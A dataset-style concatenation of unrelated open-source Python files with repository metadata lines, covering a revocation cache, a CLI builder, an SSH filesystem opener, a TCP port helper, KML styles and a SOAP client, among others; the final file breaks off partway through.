# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`rev_cache` --- Cache for revocations
==========================================
"""
# Stdlib
import logging
import threading
# External
from prometheus_client import Counter, Gauge
# SCION
from lib.crypto.hash_tree import ConnectedHashTree
# Exported metrics.
REVS_TOTAL = Gauge("rc_revs_total", "# of cached revocations", ["server_id", "isd_as"])
REVS_BYTES = Gauge("rc_revs_bytes", "RevCache memory usage", ["server_id", "isd_as"])
REVS_ADDED = Counter("rc_revs_added_total", "Total revocations added",
["server_id", "isd_as"])
REVS_REMOVED = Counter("rc_revs_removed_total", "Total revocations removed",
["server_id", "isd_as"])
def _mk_key(rev_info):
"""Returns the key for a RevocationInfo object."""
return (rev_info.isd_as(), rev_info.p.ifID)
class RevCache:
"""Thread-safe cache for revocations with auto expiration of entries."""
def __init__(self, capacity=1000, labels=None): # pragma: no cover
"""
:param dict labels:
Labels added to the exported metrics. The following labels are supported:
- server_id: A unique identifier of the server that is exporting
- isd_as: The ISD_AS of where the server is running
- type: A generic label for the type of the revocations.
"""
self._cache = {}
self._lock = threading.RLock()
self._capacity = capacity
self._labels = labels
if self._labels:
self._init_metrics()
def _init_metrics(self): # pragma: no cover
REVS_TOTAL.labels(**self._labels).set(0)
REVS_BYTES.labels(**self._labels).set(0)
REVS_ADDED.labels(**self._labels).inc(0)
REVS_REMOVED.labels(**self._labels).inc(0)
def __contains__(self, rev_info): # pragma: no cover
return self.contains_key(_mk_key(rev_info))
def contains_key(self, key): # pragma: no cover
with self._lock:
stored_info = self._cache.get(key)
return stored_info and self._validate_entry(stored_info)
def __getitem__(self, key): # pragma: no cover
return self.get(key)
def get(self, key, default=None):
with self._lock:
try:
rev_info = self._cache[key]
except KeyError:
return default
if self._validate_entry(rev_info):
return rev_info
return default
def add(self, rev_info):
"""
Adds rev_info to the cache and returns True if the operation succeeds.
"""
if ConnectedHashTree.verify_epoch(rev_info.p.epoch) != ConnectedHashTree.EPOCH_OK:
return False
with self._lock:
key = _mk_key(rev_info)
stored_info = self.get(key)
if not stored_info:
# Try to free up space in case the cache reaches the cap limit.
if len(self._cache) >= self._capacity:
for info in list(self._cache.values()):
self._validate_entry(info)
# Couldn't free up enough space...
if len(self._cache) >= self._capacity:
logging.error("Revocation cache full!.")
return False
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info))
                return True
if rev_info.p.epoch > stored_info.p.epoch:
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_REMOVED.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info) - len(stored_info))
return True
            return False
def _validate_entry(self, rev_info, cur_epoch=None): # pragma: no cover
"""Removes an expired revocation from the cache."""
if (ConnectedHashTree.verify_epoch(rev_info.p.epoch, cur_epoch) !=
ConnectedHashTree.EPOCH_OK):
del self._cache[_mk_key(rev_info)]
if self._labels:
REVS_REMOVED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).dec()
REVS_BYTES.labels(**self._labels).dec(len(rev_info))
return False
return True
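# A minimal sketch of the intended call pattern (rev_info stands for a real
# RevocationInfo whose epoch is still valid):
#
#     cache = RevCache(capacity=1000)
#     if cache.add(rev_info):                  # False once the epoch is stale
#         assert rev_info in cache             # __contains__ re-validates
#         cached = cache.get(_mk_key(rev_info))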
|
romilly/pegasus-autocode
|
autocode/firstprog.py
|
Python
|
mit
| 126 | 0 |
__author__ = 'romilly'
v1 = 1.0
v2 = 1.0
n1 = 1
while v2 > 10e-6:
    v2 = v2 / n1
v1 = v1 + v2
n1 = n1 + 1
print v1
|
oVirt/jenkins
|
stdci_libs/inject_repos.py
|
Python
|
gpl-3.0
| 1,611 | 0.003724 |
#!/usr/bin/env python3
"""inject_repos.py - CI secret repos injection.
"""
import yaml
from lxml import etree
from lxml.etree import ElementTree as ET
import argparse
from six import iteritems
def main():
repos_file, beaker_file = parse_args()
    repos = load_secret_data(repos_file)
inject_repos(repos, beaker_file)
def parse_args():
    description_msg = 'Resolve and filter secret data'
parser = argparse.ArgumentParser(description=description_msg)
parser.add_argument(
"-f", "--secret-file", type=str,
help=("Path to secret file.")
)
parser.add_argument(
"-b", "--beaker-file", type=str,
help=("Path to beaker file.")
)
args = parser.parse_args()
return args.secret_file, args.beaker_file
def load_secret_data(file_to_load=None):
"""Load yaml file from a given location
:param str file_to_load: (optional) Path to the file we need to load.
:rtype: list
:returns: A list with the file's data. An empty list if data was not found.
"""
try:
with open(file_to_load, 'r') as sf:
return yaml.safe_load(sf)
except IOError:
return []
def inject_repos(repos, beaker_file):
parser = etree.XMLParser(strip_cdata=False)
tree = etree.parse(beaker_file, parser)
root = tree.getroot()
for repo_name, url in iteritems(repos):
etree.SubElement(root[1][0][4], "repo",
attrib={"name": repo_name, "url": url})
tree.write(
beaker_file, pretty_print=True,
xml_declaration=True, encoding="utf-8"
)
if __name__ == "__main__":
main()
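# A minimal sketch of the SubElement call used above (XML layout hypothetical;
# the real beaker file nests its <repos> element at root[1][0][4]):
#
#     from lxml import etree
#     repos = etree.fromstring("<repos/>")
#     etree.SubElement(repos, "repo", attrib={"name": "ci", "url": "http://example.com/ci"})
#     etree.tostring(repos)  # b'<repos><repo name="ci" url="http://example.com/ci"/></repos>'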
|
vecnet/vnetsource
|
ts_emod/views/DownloadView.py
|
Python
|
mpl-2.0
| 1,812 | 0.004415 |
########################################################################################################################
# VECNet CI - Prototype
# Date: 03/21/2014
# Institution: University of Notre Dame
# Primary Authors:
# Robert Jones <Robert.Jones.428@nd.edu>
########################################################################################################################
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest
from lib.templatetags.base_extras import set_notification
def download_view(request, file_type=None):
"""
## View for file downloads ##
- Given a file_type, return the file of that type from the scenario in the session.
    filetypes = [
        'air binary',
'air json',
'humidity binary',
'humidity json',
'land_temp binary',
'land_temp json',
'rainfall binary',
'rainfall json',
'config',
'campaign',
'demographics',
]
"""
if file_type is None:
        return HttpResponseBadRequest('No file selected for download.')
if 'scenario' not in request.session.keys():
return HttpResponseBadRequest('No scenario selected to download from.')
try:
my_file = request.session['scenario'].get_file_by_type(file_type)
except ObjectDoesNotExist:
set_notification('alert-error', '<strong>Error!</strong> File does not exist.', request.session)
return HttpResponseBadRequest('Scenario does not contain a file of this type.')
response = HttpResponse(mimetype='text/plain')
response['Content-Disposition'] = 'attachment; filename="%s"' % my_file.file_name
response.write(my_file.content)
return response
|
bosmanoglu/adore-doris
|
lib/ext/snaphu-v1.4.2/cython/setup.py
|
Python
|
gpl-2.0
| 550 | 0.027273 |
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
    cmdclass = {'build_ext' : build_ext},
ext_modules=[Extension("_snaphu",
sources=["_snaphu.pyx",
"../src/snaphu.c",
"../src/snaphu_solver.c",
"../src/snaphu_util.c",
"../src/snaphu_cost.c",
"../src/snaphu_cs2.c",
"../src/snaphu_io.c",
"../src/snaphu_tile.c"],
include_dirs=['../src'],
                           extra_compile_args=['-Wstrict-prototypes', ],
language="c")]
)
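# Typical invocation for building the wrapper in place (assumes Cython and a C
# toolchain are installed):
#
#     python setup.py build_ext --inplace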
|
henrysher/opslib
|
opslib/icsutils/jsoncli.py
|
Python
|
apache-2.0
| 2,568 | 0 |
"""
JsonCli: Library for CLI based on JSON
--------------------------------------
+-------------------------------------+
| This is the JsonCli common library. |
+-------------------------------------+
"""
import argparse
from collections import OrderedDict
from argcomplete import autocomplete
from botocore import xform_name
type_map = {
'structure': str,
'map': str,
'timestamp': str,
'list': str,
'string': str,
'float': float,
'integer': int,
'long': int,
'boolean': bool,
'double': float,
'blob': str}
class OrderNamespace(argparse.Namespace):
"""
Namespace with Order: from argparse.Namespace
"""
__order__ = OrderedDict()
def __init__(self, **kwargs):
super(OrderNamespace, self).__init__(**kwargs)
def __setattr__(self, attr, value):
if value is not None:
self.__order__[attr] = value
super(OrderNamespace, self).__setattr__(attr, value)
def add_arguments(group, args):
"""
Add Arguments to CLI
"""
for kkk, vvv in args.iteritems():
if 'type' in vvv and vvv['type'] in type_map:
vvv['type'] = type_map[vvv['type']]
if 'help' in vvv and not vvv['help']:
vvv['help'] = argparse.SUPPRESS
changed = xform_name(kkk, "-")
if kkk != changed:
kkk = "-".join(["", changed])
group.add_argument(kkk, **vvv)
return group
def recursive_parser(parser, args):
"""
Recursive CLI Parser
"""
subparser = parser.add_subparsers(help=args.get(
'__help__', ''), dest=args.get('__dest__', ''))
for k, v in args.iteritems():
if k == '__help__' or k == '__dest__':
continue
        group = subparser.add_parser(k, help=v.get('help', ''))
for kk, vv in v.iteritems():
if kk == 'Subparsers':
group = recursive_parser(group, vv)
elif kk == 'Arguments':
group = add_arguments(group, vv)
return parser
def parse_args(args):
"""
Create the Command Line Interface
:type args: dict
:param args: describes the command structure for the CLI
"""
parser = argparse.ArgumentParser(description=args.get('Description', ''))
for k, v in args.iteritems():
if k == 'Subparsers':
parser = recursive_parser(parser, v)
elif k == 'Arguments':
parser = add_arguments(parser, v)
autocomplete(parser)
return parser.parse_args(None, OrderNamespace())
# vim: tabstop=4 shiftwidth=4 softtabstop=4
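# A hypothetical command description in the structure parse_args() expects;
# every key and value below is illustrative (OrderedDict is imported above):
#
#     cli = {
#         'Description': 'demo tool',
#         'Arguments': OrderedDict([
#             ('DryRun', {'type': 'boolean', 'help': 'print actions only'}),
#             ('Count', {'type': 'integer', 'help': 'how many repetitions'}),
#         ]),
#     }
#     args = parse_args(cli)   # an OrderNamespace preserving option order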
|
grahamhayes/designate
|
designate/tests/test_api/test_v2/test_limits.py
|
Python
|
apache-2.0
| 2,306 | 0 |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <kiall@managedit.ie>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from designate.tests.test_api.test_v2 import ApiV2TestCase
class ApiV2LimitsTest(ApiV2TestCase):
def test_get_limits(self):
response = self.client.get('/limits/')
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('max_zones', response.json)
self.assertIn('max_zone_records', response.json)
self.assertIn('max_zone_recordsets',
response.json)
self.assertIn('max_recordset_records',
response.json)
        self.assertIn('min_ttl', response.json)
self.assertIn('max_zone_name_length',
response.json)
self.assertIn('max_recordset_name_length',
response.json)
self.assertIn('max_page_limit',
response.json)
absolutelimits = response.json
self.assertEqual(cfg.CONF.quota_zones, absolutelimits['max_zones'])
self.assertEqual(cfg.CONF.quota_zone_records,
absolutelimits['max_zone_recordsets'])
self.assertEqual(cfg.CONF['service:central'].min_ttl,
absolutelimits['min_ttl'])
self.assertEqual(cfg.CONF['service:central'].max_zone_name_len,
absolutelimits['max_zone_name_length'])
self.assertEqual(cfg.CONF['service:central'].max_recordset_name_len,
absolutelimits['max_recordset_name_length'])
self.assertEqual(cfg.CONF['service:api'].max_limit_v2,
absolutelimits['max_page_limit'])
|
numberoverzero/bottom
|
tests/integ/test_local.py
|
Python
|
mit
| 546 | 0 |
def test_connect(client, connect):
"""Con
|
nect client triggers client_connect"""
connect()
assert client.triggers['CLIENT_CONNECT'] == 1
def test_ping_pong(client, server, connect, flush):
connect()
server.write("PING
|
:ping-message")
client.send("PONG")
# Protocol doesn't advance until loop flushes
assert not client.triggers["PING"]
assert not server.received
flush()
flush()
# Both should have been received now
assert client.triggers["PING"] == 1
assert server.received == ["PONG"]
|
althonos/fs.sshfs
|
fs/opener/sshfs.py
|
Python
|
lgpl-2.1
| 1,998 | 0.002002 |
# coding: utf-8
from __future__ import unicode_literals
from __future__ import absolute_import
import configparser
import six
from .base import Opener
from .registry import registry
from ..subfs import ClosingSubFS
from ..errors import FSError, CreateFailed
__license__ = "LGPLv2+"
__copyright__ = "Copyright (c) 2017-2021 Martin Larralde"
__author__ = "Martin Larralde <martin.larralde@embl.de>"
__version__ = (
__import__("pkg_resources")
.resource_string("fs.sshfs", "_version.txt")
.strip()
.decode("ascii")
)
class SSHOpener(Opener):
protocols = ['ssh']
@staticmethod
def open_fs(fs_url, parse_result, writeable, create, cwd):
from ..sshfs import SSHFS
ssh_host, _, dir_path = parse_result.resource.partition('/')
ssh_host, _, ssh_port = ssh_host.partition(':')
ssh_port = int(ssh_port) if ssh_port.isdigit() else 22
params = configparser.ConfigParser()
params.read_dict({'sshfs':getattr(parse_result, 'params', {})})
ssh_fs = SSHFS(
ssh_host,
user=parse_result.username,
passwd=parse_result.password,
pkey=params.get('sshfs', 'pkey', fallback=None),
timeout=params.getint('sshfs', 'timeout', fallback=10),
port=ssh_port,
keepalive=params.getint('sshfs', 'keepalive', fallback=10),
compress=params.getboolean('sshfs', 'compress', fallback=False),
config_path=\
params.get('sshfs', 'config_path', fallback='~/.ssh/config'),
exec_timeout=params.getint('sshfs', 'timeout', fallback=None),
)
try:
if dir_path:
if create:
ssh_fs.makedirs(dir_path, recreate=True)
return ssh_fs.opendir(dir_path, factory=ClosingSubFS)
else:
return ssh_fs
except Exception as err:
six.raise_from(CreateFailed, err)
registry.install(SSHOpener)
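# A usage sketch through the pyfilesystem2 opener machinery (host, credentials
# and query parameters are hypothetical):
#
#     import fs
#     remote = fs.open_fs("ssh://user:secret@example.org:2222/var/data?timeout=5")
#     remote.listdir("/")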
|
EdFarrell/MilkMachine
|
src/MilkMachine/simplekml/styleselector.py
|
Python
|
gpl-3.0
| 6,912 | 0.002315 |
"""
Copyright 2011-2012 Kyle Lancaster
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Contact me at kyle.lan@gmail.com
"""
from simplekml.base import Kmlable, check
from simplekml.substyle import IconStyle, LabelStyle, LineStyle, PolyStyle, BalloonStyle, ListStyle
class StyleSelector(Kmlable):
"""Abstract style class, extended by :class:`simplekml.Style` and :class:`simplekml.StyleMap`
There are no arguments.
"""
_id = 0
def __init__(self):
super(StyleSelector, self).__init__()
self._id = "stylesel_{0}".format(StyleSelector._id)
StyleSelector._id += 1
@property
def id(self):
"""The id of the style, read-only."""
return self._id
class Style(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(name='A Point')
pnt.coords = [(1.0, 2.0)]
pnt.style.labelstyle.color = simplekml.Color.red # Make the text red
pnt.style.labelstyle.scale = 2 # Make the text twice as big
pnt.style.iconstyle.icon.href = 'http://maps.google.com/mapfiles/kml/shapes/placemark_circle.png'
kml.save("Style.kml")
"""
def __init__(self,
iconstyle=None,
labelstyle=None,
linestyle=None,
polystyle=None,
balloonstyle=None,
liststyle=None):
super(Style, self).__init__()
self._kml["IconStyle_"] = iconstyle
self._kml["LabelStyle_"] = labelstyle
self._kml["LineStyle_"] = linestyle
self._kml["PolyStyle_"] = polystyle
self._kml["BalloonStyle"] = balloonstyle
self._kml["ListStyle"] = liststyle
def __str__(self):
return '<Style id="{0}">{1}</Style>'.format(self._id, super(Style, self).__str__())
@property
def iconstyle(self):
"""The iconstyle, accepts :class:`simplekml.IconStyle`."""
if self._kml["IconStyle_"] is None:
self._kml["IconStyle_"] = IconStyle()
return self._kml["IconStyle_"]
@iconstyle.setter
@check(IconStyle)
def iconstyle(self, iconstyle):
self._kml["IconStyle_"] = iconstyle
@property
def labelstyle(self):
"""The labelstyle, accepts :class:`simplekml.LabelStyle`."""
if self._kml["LabelStyle_"] is None:
self._kml["LabelStyle_"] = LabelStyle()
return self._kml["LabelStyle_"]
@labelstyle.setter
@check(LabelStyle)
def labelstyle(self, labelstyle):
self._kml["LabelStyle_"] = labelstyle
@property
def linestyle(self):
"""The linestyle, accepts :class:`simplekml.LineStyle`."""
if self._kml["LineStyle_"] is None:
self._kml["LineStyle_"] = LineStyle()
return self._kml["LineStyle_"]
@linestyle.setter
@check(LineStyle)
def linestyle(self, linestyle):
self._kml["LineStyle_"] = linestyle
@property
def polystyle(self):
"""The polystyle, accepts :class:`simplekml.PolyStyle`."""
if self._kml["PolyStyle_"] is None:
self._kml["PolyStyle_"] = PolyStyle()
return self._kml["PolyStyle_"]
@polystyle.setter
@check(PolyStyle)
def polystyle(self, polystyle):
self._kml["PolyStyle_"] = polystyle
@property
def balloonstyle(self):
"""The balloonstyle, accepts :class:`simplekml.BalloonStyle`."""
if self._kml["BalloonStyle"] is None:
self._kml["BalloonStyle"] = BalloonStyle()
return self._kml["BalloonStyle"]
@balloonstyle.setter
@check(BalloonStyle)
def balloonstyle(self, balloonstyle):
self._kml["BalloonStyle"] = balloonstyle
@property
def liststyle(self):
"""The liststyle, accepts :class:`simplekml.ListStyle`."""
if self._kml["ListStyle"] is None:
self._kml["ListStyle"] = ListStyle()
return self._kml["ListStyle"]
@liststyle.setter
@check(ListStyle)
def liststyle(self, liststyle):
self._kml["ListStyle"] = liststyle
class StyleMap(StyleSelector):
"""Styles affect how Geometry is presented.
Arguments are the same as the properties.
Usage::
import simplekml
kml = simplekml.Kml()
pnt = kml.newpoint(coords=[(18.432314,-33.988862)])
pnt.stylemap.normalstyle.labelstyle.color = simplekml.Color.blue
pnt.stylemap.highlightstyle.labelstyle.color = simplekml.Color.red
kml.save("StyleMap.kml")
"""
def __init__(self,
normalstyle=None,
highlightstyle=None):
super(StyleMap, self).__init__()
self._pairnormal = None
self._pairhighlight = None
self.normalstyle = normalstyle
self.highlightstyle = highlightstyle
def __str__(self):
buf = ['<StyleMap id="{0}">'.format(self._id),
super(StyleMap, self).__str__()]
if self._pairnormal is not None:
buf.append("<Pair>")
buf.append("<key>normal</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairnormal._id))
buf.append("</Pair>")
if self._pairhighlight is not None:
buf.append("<Pair>")
buf.append("<key>highlight</key>")
buf.append("<styleUrl>#{0}</styleUrl>".format(self._pairhighlight._id))
buf.append("</Pair>")
buf.append("</StyleMap>")
return "".join(buf)
@property
def normalstyle(self):
"""The normal :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairnormal is None:
self._pairnormal = Style()
return self._pairnormal
@normalstyle.setter
@check(Style)
def normalstyle(self, normal):
self._pairnormal = normal
@property
def highlightstyle(self):
"""The highlighted :class:`simplekml.Style`, accepts :class:`simplekml.Style`."""
if self._pairhighlight is None:
self._pairhighlight = Style()
return self._pairhighlight
@highlightstyle.setter
@check(Style)
def highlightstyle(self, highlighturl):
self._pairhighlight = highlighturl
|
xolox/python-executor
|
executor/tcp.py
|
Python
|
mit
| 6,803 | 0.003675 |
# Programmer friendly subprocess wrapper.
#
# Author: Peter Odding <peter@peterodding.com>
# Last Change: March 2, 2020
# URL: https://executor.readthedocs.io
"""
Miscellaneous TCP networking functionality.
The functionality in this module originated in the :class:`executor.ssh.server`
module with the purpose of facilitating a robust automated test suite for the
:class:`executor.ssh.client` module. While working on SSH tunnel support I
needed similar logic again and I decided to extract this code from the
:class:`executor.ssh.server` module.
"""
# Standard library modules.
import itertools
import logging
import random
import socket
# Modules included in our package.
from executor import ExternalCommand
# External dependencies.
from humanfriendly import Timer, format_timespan
from humanfriendly.terminal.spinners import Spinner
from humanfriendly.text import format, pluralize
from property_manager import (
PropertyManager,
lazy_property,
mutable_property,
required_property,
set_property,
)
# Public identifiers that require documentation.
__all__ = (
'EphemeralPortAllocator',
'EphemeralTCPServer',
'TimeoutError',
'WaitUntilConnected',
'logger',
)
# Initialize a logger.
logger = logging.getLogger(__name__)
class WaitUntilConnected(PropertyManager):
"""Wait for a TCP endpoint to start accepting connections."""
@mutable_property
def connect_timeout(self):
"""The timeout in seconds for individual connection attempts (a number, defaults to 2)."""
return 2
@property
def endpoint(self):
"""A human friendly representation of the TCP endpoint (a string containing a URL)."""
return format("%s://%s:%i", self.scheme, self.hostname, self.port_number)
@mutable_property
def hostname(self):
"""The host name or IP address to connect to (a string, defaults to ``localhost``)."""
return 'localhost'
@property
def is_connected(self):
""":data:`True` if a connection was accepted, :data:`False` otherwise."""
timer = Timer()
logger.debug("Checking whether %s is accepting connections ..", self.endpoint)
try:
socket.create_connection((self.hostname, self.port_number), self.connect_timeout)
logger.debug("Yes %s is accepting connections (t
|
ook %s).", self.endpoint, timer)
return True
except Exception:
logger.debug("No %s isn't accepting connections (took %s).", self.endpoint, timer)
return False
@required_property
def port_number(self):
"""The port number to connect to (an integer)."""
@mutable_property
    def scheme(self):
"""A URL scheme that indicates the purpose of the ephemeral port (a string, defaults to 'tcp')."""
return 'tcp'
@mutable_property
def wait_timeout(self):
"""The timeout in seconds for :func:`wait_until_connected()` (a number, defaults to 30)."""
return 30
def wait_until_connected(self):
"""
Wait until connections are being accepted.
:raises: :exc:`TimeoutError` when the SSH server isn't fast enough to
initialize.
"""
timer = Timer()
with Spinner(timer=timer) as spinner:
while not self.is_connected:
if timer.elapsed_time > self.wait_timeout:
raise TimeoutError(format(
"Failed to establish connection to %s within configured timeout of %s!",
self.endpoint, format_timespan(self.wait_timeout),
))
spinner.step(label="Waiting for %s to accept connections" % self.endpoint)
spinner.sleep()
logger.debug("Waited %s for %s to accept connections.", timer, self.endpoint)
class EphemeralPortAllocator(WaitUntilConnected):
"""
Allocate a free `ephemeral port number`_.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@lazy_property
def port_number(self):
"""A dynamically selected free ephemeral port number (an integer between 49152 and 65535)."""
timer = Timer()
logger.debug("Looking for free ephemeral port number ..")
for i in itertools.count(1):
value = self.ephemeral_port_number
set_property(self, 'port_number', value)
if not self.is_connected:
logger.debug("Found free ephemeral port number %s after %s (took %s).",
value, pluralize(i, "attempt"), timer)
return value
@property
def ephemeral_port_number(self):
"""A random ephemeral port number (an integer between 49152 and 65535)."""
return random.randint(49152, 65535)
class EphemeralTCPServer(ExternalCommand, EphemeralPortAllocator):
"""
Make it easy to launch ephemeral TCP servers.
The :class:`EphemeralTCPServer` class makes it easy to allocate an
`ephemeral port number`_ that is not (yet) in use.
.. _ephemeral port number: \
http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers#Dynamic.2C_private_or_ephemeral_ports
"""
@property
def asynchronous(self):
"""Ephemeral TCP servers always set :attr:`.ExternalCommand.asynchronous` to :data:`True`."""
return True
def start(self, **options):
"""
Start the TCP server and wait for it to start accepting connections.
:param options: Any keyword arguments are passed to the
:func:`~executor.ExternalCommand.start()` method of the
superclass.
:raises: Any exceptions raised by :func:`~executor.ExternalCommand.start()`
and :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`.
If the TCP server doesn't start accepting connections within the
configured timeout (see :attr:`~executor.tcp.WaitUntilConnected.wait_timeout`)
the process will be terminated and the timeout exception is propagated.
"""
if not self.was_started:
logger.debug("Preparing to start %s server ..", self.scheme.upper())
super(EphemeralTCPServer, self).start(**options)
try:
self.wait_until_connected()
except TimeoutError:
self.terminate()
raise
class TimeoutError(Exception):
"""
Raised when a TCP server doesn't start accepting connections quickly enough.
This exception is raised by :func:`~executor.tcp.WaitUntilConnected.wait_until_connected()`
when the TCP server doesn't start accepting connections within a reasonable time.
"""
|
amanharitsh123/zulip
|
zerver/management/commands/rename_stream.py
|
Python
|
apache-2.0
| 1,181 | 0.000847 |
from typing import Any
from argparse import ArgumentParser
from zerver.lib.actions import do_rename_stream
from zerver.lib.str_utils import force_text
from zerver.lib.management import ZulipBaseCommand
from zerver.models import get_stream
import sys
class Command(ZulipBaseCommand):
help = """Change the stream name for a realm."""
def add_arguments(self, parser):
# type: (ArgumentParser) -> None
parser.add_argument('old_name', metavar='<old name>', type=str,
help='name of stream to be renamed')
        parser.add_argument('new_name', metavar='<new name>', type=str,
help='new name to rename the stream to')
self.add_realm_args(parser, True)
def handle(self, *args, **options):
# type: (*Any, **str) -> None
realm = self.get_realm(options)
assert realm is not None # Should be ensured by parser
old_name = options['old_name']
new_name = options['new_name']
encoding = sys.getfilesystemencoding()
stream = get_stream(force_text(old_name, encoding), realm)
do_rename_stream(stream, force_text(new_name, encoding))
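# Hypothetical invocation (realm and stream names are examples):
#
#     python manage.py rename_stream -r zulip 'old stream name' 'new stream name'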
|
prezi/prezi-suds
|
suds/client.py
|
Python
|
lgpl-3.0
| 28,017 | 0.002498 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
"""
The I{2nd generation} service proxy provides access to web services.
See I{README.txt}
"""
import suds
import suds.metrics as metrics
from cookielib import CookieJar
from suds import *
from suds.reader import DefinitionsReader
from suds.transport import TransportError, Request
from suds.transport.https import HttpAuthenticated
from suds.servicedefinition import ServiceDefinition
from suds import sudsobject
from sudsobject import Factory as InstFactory
from sudsobject import Object
from suds.resolver import PathResolver
from suds.builder import Builder
from suds.wsdl import Definitions
from suds.cache import ObjectCache
from suds.sax.document import Document
from suds.sax.parser import Parser
from suds.options import Options
from suds.properties import Unskin
from urlparse import urlparse
from copy import deepcopy
from suds.plugin import PluginContainer
from logging import getLogger
log = getLogger(__name__)
class Client(object):
"""
A lightweight web services client.
I{(2nd generation)} API.
@ivar wsdl: The WSDL object.
@type wsdl:L{Definitions}
@ivar service: The service proxy used to invoke operations.
@type service: L{Service}
@ivar factory: The factory used to create objects.
@type factory: L{Factory}
@ivar sd: The service definition
@type sd: L{ServiceDefinition}
@ivar messages: The last sent/received messages.
@type messages: str[2]
"""
@classmethod
def items(cls, sobject):
"""
Extract the I{items} from a suds object much like the
items() method works on I{dict}.
@param sobject: A suds object
@type sobject: L{Object}
@return: A list of items contained in I{sobject}.
@rtype: [(key, value),...]
"""
return sudsobject.items(sobject)
@classmethod
def dict(cls, sobject):
"""
Convert a sudsobject into a dictionary.
@param sobject: A suds object
@type sobject: L{Object}
@return: A python dictionary containing the
items contained in I{sobject}.
@rtype: dict
"""
return sudsobject.asdict(sobject)
@classmethod
def metadata(cls, sobject):
"""
Extract the metadata from a suds object.
@param sobject: A suds object
@type sobject: L{Object}
@return: The object's metadata
@rtype: L{sudsobject.Metadata}
"""
return sobject.__metadata__
def __init__(self, url, **kwargs):
"""
@param url: The URL for the WSDL.
@type url: str
@param kwargs: keyword arguments.
@see: L{Options}
"""
options = Options()
options.transport = HttpAuthenticated()
self.options = options
options.cache = ObjectCache(days=1)
self.set_options(**kwargs)
reader = DefinitionsReader(options, Definitions)
self.wsdl = reader.open(url)
plugins = PluginContainer(options.plugins)
plugins.init.initialized(wsdl=self.wsdl)
self.factory = Factory(self.wsdl)
self.service = ServiceSelector(self, self.wsdl.services)
self.sd = []
for s in self.wsdl.services:
sd = ServiceDefinition(self.wsdl, s)
self.sd.append(sd)
self.messages = dict(tx=None, rx=None)
def set_options(self, **kwargs):
"""
Set options.
@param kwargs: keyword arguments.
@see: L{Options}
"""
p = Unskin(self.options)
p.update(kwargs)
def add_prefix(self, prefix, uri):
"""
Add I{static} mapping of an XML namespace prefix to a namespace.
This is useful for cases when a wsdl and referenced schemas make heavy
use of namespaces and those namespaces are subject to changed.
@param prefix: An XML namespace prefix.
@type prefix: str
@param uri: An XML namespace URI.
@type uri: str
@raise Exception: when prefix is already mapped.
"""
root = self.wsdl.root
mapped = root.resolvePrefix(prefix, None)
if mapped is None:
root.addPrefix(prefix, uri)
return
if mapped[1] != uri:
raise Exception('"%s" already mapped as "%s"' % (prefix, mapped))
def last_sent(self):
"""
Get last sent I{soap} message.
@return: The last sent I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('tx')
def last_received(self):
"""
Get last received I{soap} message.
@return: The last received I{soap} message.
@rtype: L{Document}
"""
return self.messages.get('rx')
def clone(self):
"""
Get a shallow clone of this object.
The clone only shares the WSDL. All other attributes are
unique to the cloned object including options.
@return: A shallow clone.
@rtype: L{Client}
"""
class Uninitialized(Client):
def __init__(self):
pass
clone = Uninitialized()
clone.options = Options()
cp = Unskin(clone.options)
mp = Unskin(self.options)
cp.update(deepcopy(mp))
clone.wsdl = self.wsdl
clone.factory = self.factory
clone.service = ServiceSelector(clone, self.wsdl.services)
clone.sd = self.sd
clone.messages = dict(tx=None, rx=None)
return clone
def __str__(self):
return unicode(self)
def __unicode__(self):
s = ['\n']
build = suds.__build__.split()
s.append('Suds ( https://fedorahosted.org/suds/ )')
s.append(' version: %s' % suds.__version__)
s.append(' %s build: %s' % (build[0], build[1]))
for sd in self.sd:
            s.append('\n\n%s' % unicode(sd))
return ''.join(s)
class Factory:
"""
